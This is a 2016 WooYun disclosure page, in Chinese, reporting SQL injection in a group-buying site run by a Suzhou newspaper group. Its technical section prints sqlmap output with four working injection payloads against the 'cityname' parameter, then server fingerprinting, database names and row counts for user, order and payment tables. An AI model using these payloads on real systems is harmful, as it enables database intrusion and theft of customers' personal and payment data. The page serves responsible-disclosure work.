当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0169210

漏洞标题:某团购站SQL注入 泄露订单信息

相关厂商:苏州日报报业集团

漏洞作者: 蝶.!

提交时间:2016-01-17 22:30

修复时间:2016-02-27 11:49

公开时间:2016-02-27 11:49

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-17: 细节已通知厂商并且等待厂商处理中
2016-01-20: 厂商已经确认,细节仅向厂商公开
2016-01-30: 细节向核心白帽子及相关领域专家公开
2016-02-09: 细节向普通白帽子公开
2016-02-19: 细节向实习白帽子公开
2016-02-27: 细节向公众公开

简要描述:

苏州豹行天下电子商务有限公司是苏州日报报业集团全资子公司,成立于2010年,注册资金200万元。公司成立就创建了豹团网,是团购模式生活服务类网站,也是报业集团唯一大型电商平台。

详细说明:

注入点:http://**.**.**.**//index.php?m=Index&a=index&cityname=suzhou

---
Parameter: cityname (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: m=Index&a=index&cityname=-9529%00' OR 9145=9145#
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: m=Index&a=index&cityname=suzhou%00' AND (SELECT 5114 FROM(SELECT COUNT(*),CONCAT(0x7171767a71,(SELECT (ELT(5114=5114,1))),0x71766a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'sQwW'='sQwW
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: m=Index&a=index&cityname=suzhou%00' AND (SELECT * FROM (SELECT(SLEEP(5)))frvr) AND 'bKGS'='bKGS
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: m=Index&a=index&cityname=suzhou%00' UNION ALL SELECT CONCAT(0x7171767a71,0x70796555514b6b555463766d4f6e5145444a6c645957714b655a66446a4c68564358615176747a47,0x71766a6a71),NULL-- -
---
web server operating system: Linux CentOS 5.10
web application technology: Apache 2.2.3, PHP 5.1.6
back-end DBMS: MySQL 5.0
available databases [12]:
[*] 0512bao
[*] information_schema
[*] monitor_db
[*] mysql
[*] pointshop_db
[*] pointshop_db_20150723
[*] pointshop_db_bak
[*] subaotuan_cui
[*] subaotuan_hx
[*] subaotuan_linux
[*] sz69333333_db
[*] szbt

漏洞证明:

web server operating system: Linux CentOS 5.10
web application technology: Apache 2.2.3, PHP 5.1.6
back-end DBMS: MySQL 5.0
Database: 0512bao
+-----------------------------------+---------+
| Table | Entries |
+-----------------------------------+---------+
| pre_ucenter_members | 92498 |
| pre_ucenter_memberfields | 92497 |
| pre_ucenter_mergemembers | 50966 |
| pre_common_district | 45051 |
| pre_common_member_count | 17507 |
| pre_common_member_status | 17507 |
| pre_common_member | 17506 |
| pre_common_member_field_home | 13049 |
| pre_forum_statlog | 10601 |
web server operating system: Linux CentOS 5.10
web application technology: Apache 2.2.3, PHP 5.1.6
back-end DBMS: MySQL 5.0
Database: subaotuan_cui
+----------------------------------+---------+
| Table | Entries |
+----------------------------------+---------+
| fanwe_payment_log | 315921 |
| fanwe_group_bond | 265639 |
| fanwe_sms_send_log | 259919 |
| fanwe_order_goods | 198486 |
| fanwe_order | 197548 |
| fanwe_payment_money_log | 145783 |
| fanwe_order_incharge | 144277 |
| fanwe_send_list | 82702 |
| fanwe_user | 72702 |

修复方案:

版权声明:转载请注明来源 蝶.!@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2016-01-20 14:22

厂商回复:

CNVD确认未复现所述情况,已经转由CNCERT下发给江苏分中心,由其后续协调网站管理单位处置.

最新状态:

暂无


漏洞评价:

评价